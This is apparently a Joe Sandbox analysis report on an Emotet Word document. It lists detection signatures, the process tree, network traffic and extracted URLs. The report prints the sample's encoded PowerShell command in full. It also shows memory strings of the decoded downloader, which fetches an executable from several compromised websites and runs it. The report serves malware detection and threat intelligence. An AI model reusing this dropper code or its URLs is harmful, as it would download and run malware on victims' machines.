Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report emotet.doc

Overview

General Information

Sample Name:emotet.doc
Analysis ID:326849
MD5:b92021ca10aed3046fc3be5ac1c2a094
SHA1:0fb1ad5b53cdd09a7268c823ec796a6e623f086f
SHA256:c378387344e0a552dc065de6bfa607fd26e0b5c569751c79fbf9c6f2e91c9807

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates HTML files with .exe extension (expired dropper behavior)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Encrypted powershell cmdline option found
Machine Learning detection for sample
Potential dropper URLs found in powershell memory
Allocates a big amount of memory (probably used for heap spraying)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 5776 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • splwow64.exe (PID: 4812 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
  • powershell.exe (PID: 5596 cmdline: powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA= MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 2148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: https://atnimanvilla.com/wp-content/073735/Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: atnimanvilla.comVirustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: emotet.docVirustotal: Detection: 74%Perma Link
Source: emotet.docMetadefender: Detection: 35%Perma Link
Source: emotet.docReversingLabs: Detection: 72%
Machine Learning detection for sampleShow sources
Source: emotet.docJoe Sandbox ML: detected
Source: winword.exeMemory has grown: Private usage: 0MB later: 83MB
Source: global trafficDNS query: name: blockchainjoblist.com
Source: global trafficTCP traffic: 192.168.2.3:49712 -> 204.11.56.48:443
Source: global trafficTCP traffic: 192.168.2.3:49710 -> 204.11.56.48:80

Networking:

barindex
Creates HTML files with .exe extension (expired dropper behavior)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: 284.exe.2.dr
Potential dropper URLs found in powershell memoryShow sources
Source: powershell.exe, 00000002.00000002.246284109.000001C99C6F3000.00000004.00000001.sdmpString found in memory: CommandLine=$jrFhA0='Wf1rHz';$uUMMLI = '284';$iBtj49N='ThMqW8s0';$FwcAJs6=$env:userprofile+'\'+$uUMMLI+'.exe';$S9GzRstM='EFCwnlGz';$u8UAr3=&('n'+'ew'+'-object') NeT.wEBClIEnt;$pLjBqINE='http://blockchainjoblist.com/wp-admin/014080/
Source: powershell.exe, 00000002.00000002.246284109.000001C99C6F3000.00000004.00000001.sdmpString found in memory: https://womenempowermentpakistan.com/wp-admin/paba5q52/
Source: powershell.exe, 00000002.00000002.246284109.000001C99C6F3000.00000004.00000001.sdmpString found in memory: https://atnimanvilla.com/wp-content/073735/
Source: powershell.exe, 00000002.00000002.246284109.000001C99C6F3000.00000004.00000001.sdmpString found in memory: https://yeuquynhnhai.com/upload/41830/
Source: powershell.exe, 00000002.00000002.246284109.000001C99C6F3000.00000004.00000001.sdmpString found in memory: https://deepikarai.com/js/4bzs6/'."sPL`iT"('
Source: powershell.exe, 00000002.00000002.246284109.000001C99C6F3000.00000004.00000001.sdmpString found in memory: ');$l4sJloGw='zISjEmiP';foreach($V3hEPMMZ in $pLjBqINE){try{$u8UAr3."DOw`N`lOaDfi`Le"($V3hEPMMZ, $FwcAJs6);$IvHHwRib='s5Ts_iP8';If ((&('G'+'e'+'t-Item') $FwcAJs6)."LeN`gTh" -ge 23931) {[Diagnostics.Process]::"ST`ArT"($FwcAJs6);$zDNs8wi='F3Wwo0';break;$TTJptXB='ijlWhCzP'}}catch{}}$vZzi_uAp='aEBtpj4'
Source: powershell.exe, 00000002.00000002.246284109.000001C99C6F3000.00000004.00000001.sdmpString found in memory: ');$l4sJloGw='zISjEmiP';foreach($V3hEPMMZ in $pLjBqINE){try{$u8UAr3."DOw`N`lOaDfi`Le"($V3hEPMMZ, $FwcAJs6);$IvHHwRib='s5Ts_iP8';If ((&('G'+'e'+'t-Item') $FwcAJs6)."LeN`gTh" -ge 23931) {[Diagnostics.Process]::"ST`ArT"($FwcAJs6);$zDNs8wi='F3Wwo0';break;$TTJptXB='ijlWhCzP'}}catch{}}$vZzi_uAp='aEBtpj4'Xn
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in memory: M='EFCwnlGz';$u8UAr3=&('n'+'ew'+'-object') NeT.wEBClIEnt;$pLjBqINE='http://blockchainjoblist.com/wp-admin/014080/
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in memory: global:?pj4lWhCzPess]::STArT/wp-admin/014080/
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in memory: https://deepikarai.com/js/4bzs6/
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in memory: http://blockchainjoblist.com/wp-admin/014080/
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in memory: https://deepikarai.com/js/4bzs6/an.c
Source: powershell.exe, 00000002.00000002.239509332.000001C99B301000.00000004.00000001.sdmpString found in memory: $jrFhA0='Wf1rHz';$uUMMLI = '284';$iBtj49N='ThMqW8s0';$FwcAJs6=$env:userprofile+'\'+$uUMMLI+'.exe';$S9GzRstM='EFCwnlGz';$u8UAr3=&('n'+'ew'+'-object') NeT.wEBClIEnt;$pLjBqINE='http://blockchainjoblist.com/wp-admin/014080/
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmpString found in memory:
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmpString found in memory: font-face {font-family: "ubuntu-r";src: url("http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot");src: url("http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix") format("embedded-opentype"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff") format("woff"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2") format("woff2"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf") format("truetype"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf") format("opentype"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r") format("svg");font-weight: normal;font-style: normal;}
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmpString found in memory: font-face {font-family: "ubuntu-b";src: url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot");src: url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix") format("embedded-opentype"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff") format("woff"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2") format("woff2"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf") format("truetype"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf") format("opentype"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b") format("svg");font-weight: normal;font-style: normal;}
Source: global trafficHTTP traffic detected: GET /wp-admin/014080/ HTTP/1.1Host: blockchainjoblist.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /upload/41830/ HTTP/1.1Host: ww38.yeuquynhnhai.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 204.11.56.48 204.11.56.48
Source: Joe Sandbox ViewIP Address: 204.11.56.48 204.11.56.48
Source: Joe Sandbox ViewIP Address: 103.224.212.219 103.224.212.219
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox ViewASN Name: TURNKEY-INTERNETUS TURNKEY-INTERNETUS
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global trafficHTTP traffic detected: GET /wp-admin/014080/ HTTP/1.1Host: blockchainjoblist.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /upload/41830/ HTTP/1.1Host: ww38.yeuquynhnhai.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: blockchainjoblist.com
Source: powershell.exe, 00000002.00000002.246675264.000001C99CA17000.00000004.00000001.sdmpString found in binary or memory: http://701602.parkingcrew.net
Source: powershell.exe, 00000002.00000002.246621293.000001C99C99D000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000002.00000002.246570898.000001C99C956000.00000004.00000001.sdmpString found in binary or memory: http://atnimanvilla.com
Source: powershell.exe, 00000002.00000002.246105067.000001C99C56C000.00000004.00000001.sdmpString found in binary or memory: http://blockchainjoblist.com
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://blockchainjoblist.com/10_Best_Mutual_Funds.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgP
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://blockchainjoblist.com/Best_Penny_Stocks.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgPKzv
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://blockchainjoblist.com/Cheap_Air_Tickets.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgPKzv
Source: 284.exe.2.drString found in binary or memory: http://blockchainjoblist.com/Dental_Plans.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgPKzvTnog4
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://blockchainjoblist.com/Health_Insurance.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgPKzvT
Source: 284.exe.2.drString found in binary or memory: http://blockchainjoblist.com/High_Speed_Internet.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgPK
Source: 284.exe.2.drString found in binary or memory: http://blockchainjoblist.com/Migraine_Pain_Relief.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgP
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://blockchainjoblist.com/__media__/js/trademark.php?d=blockchainjoblist.com&type=mng
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://blockchainjoblist.com/display.cfm
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://blockchainjoblist.com/px.js?ch=1
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://blockchainjoblist.com/px.js?ch=2
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://blockchainjoblist.com/sk-logabpstatus.php?a=OUYxY2s4RndLc0RVbkQxazhBbjBCNHgxeEpxWFRUTXh1V1U4S
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.243056984.000001C99BD06000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.239509332.000001C99B301000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, PowerShell_transcript.258555.Xq7HteuE.20201204105711.txt.2.dr, 284.exe.2.drString found in binary or memory: http://blockchainjoblist.com/wp-admin/014080/
Source: powershell.exe, 00000002.00000002.246105067.000001C99C56C000.00000004.00000001.sdmpString found in binary or memory: http://blockchainjoblist.comx
Source: powershell.exe, 00000002.00000002.237385426.000001C999549000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000002.00000002.247724781.000001C9B36B8000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: powershell.exe, 00000002.00000002.247724781.000001C9B36B8000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000002.00000002.246621293.000001C99C99D000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000002.00000002.247759342.000001C9B36DE000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000002.00000002.247759342.000001C9B36DE000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.247759342.000001C9B36DE000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: powershell.exe, 00000002.00000002.247759342.000001C9B36DE000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: powershell.exe, 00000002.00000002.247534260.000001C9B3420000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.246621293.000001C99C99D000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000002.00000002.247687763.000001C9B3660000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000002.00000002.237385426.000001C999549000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000002.00000002.237385426.000001C999549000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000002.00000002.237385426.000001C999549000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: powershell.exe, 00000002.00000002.246675264.000001C99CA17000.00000004.00000001.sdmpString found in binary or memory: http://deepikarai.com
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
Source: 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
Source: 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
Source: 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
Source: 284.exe.2.drString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: powershell.exe, 00000002.00000002.246621293.000001C99C99D000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.247759342.000001C9B36DE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000002.00000002.237385426.000001C999549000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000002.00000002.237385426.000001C999549000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000002.00000002.247724781.000001C9B36B8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.239509332.000001C99B301000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.246570898.000001C99C956000.00000004.00000001.sdmpString found in binary or memory: http://womenempowermentpakistan.com
Source: powershell.exe, 00000002.00000002.246675264.000001C99CA17000.00000004.00000001.sdmpString found in binary or memory: http://ww38.yeuquynhnhai.com
Source: powershell.exe, 00000002.00000002.246601782.000001C99C984000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.246675264.000001C99CA17000.00000004.00000001.sdmpString found in binary or memory: http://ww38.yeuquynhnhai.com/upload/41830/
Source: powershell.exe, 00000002.00000002.246675264.000001C99CA17000.00000004.00000001.sdmpString found in binary or memory: http://ww38.yeuquynhnhai.comx
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.246675264.000001C99CA17000.00000004.00000001.sdmpString found in binary or memory: http://www.deepikarai.com
Source: powershell.exe, 00000002.00000002.246621293.000001C99C99D000.00000004.00000001.sdmpString found in binary or memory: http://yeuquynhnhai.com
Source: powershell.exe, 00000002.00000002.246570898.000001C99C956000.00000004.00000001.sdmpString found in binary or memory: https://atnimanvilla.com
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.243056984.000001C99BD06000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.239509332.000001C99B301000.00000004.00000001.sdmp, PowerShell_transcript.258555.Xq7HteuE.20201204105711.txt.2.drString found in binary or memory: https://atnimanvilla.com/wp-content/073735/
Source: powershell.exe, 00000002.00000002.246570898.000001C99C956000.00000004.00000001.sdmpString found in binary or memory: https://atnimanvilla.comx
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.246675264.000001C99CA17000.00000004.00000001.sdmpString found in binary or memory: https://deepikarai.com
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.239509332.000001C99B301000.00000004.00000001.sdmp, PowerShell_transcript.258555.Xq7HteuE.20201204105711.txt.2.drString found in binary or memory: https://deepikarai.com/js/4bzs6/
Source: powershell.exe, 00000002.00000002.243056984.000001C99BD06000.00000004.00000001.sdmpString found in binary or memory: https://deepikarai.com/js/4bzs6/(pg
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in binary or memory: https://deepikarai.com/js/4bzs6/an.c
Source: powershell.exe, 00000002.00000002.246675264.000001C99CA17000.00000004.00000001.sdmpString found in binary or memory: https://deepikarai.comx
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.246785699.000001C99CACB000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.246617138.000001C99C98C000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000002.00000002.247759342.000001C9B36DE000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000002.00000002.246284109.000001C99C6F3000.00000004.00000001.sdmpString found in binary or memory: https://womenempowermentpakistan.com
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.243056984.000001C99BD06000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.239509332.000001C99B301000.00000004.00000001.sdmp, PowerShell_transcript.258555.Xq7HteuE.20201204105711.txt.2.drString found in binary or memory: https://womenempowermentpakistan.com/wp-admin/paba5q52/
Source: powershell.exe, 00000002.00000002.246284109.000001C99C6F3000.00000004.00000001.sdmpString found in binary or memory: https://womenempowermentpakistan.comx
Source: powershell.exe, 00000002.00000002.246617138.000001C99C98C000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.246621293.000001C99C99D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000002.00000002.246675264.000001C99CA17000.00000004.00000001.sdmpString found in binary or memory: https://www.deepikarai.com
Source: powershell.exe, 00000002.00000002.246671904.000001C99CA13000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.246675264.000001C99CA17000.00000004.00000001.sdmpString found in binary or memory: https://www.deepikarai.com/js/4bzs6/
Source: powershell.exe, 00000002.00000002.246675264.000001C99CA17000.00000004.00000001.sdmpString found in binary or memory: https://www.deepikarai.comx
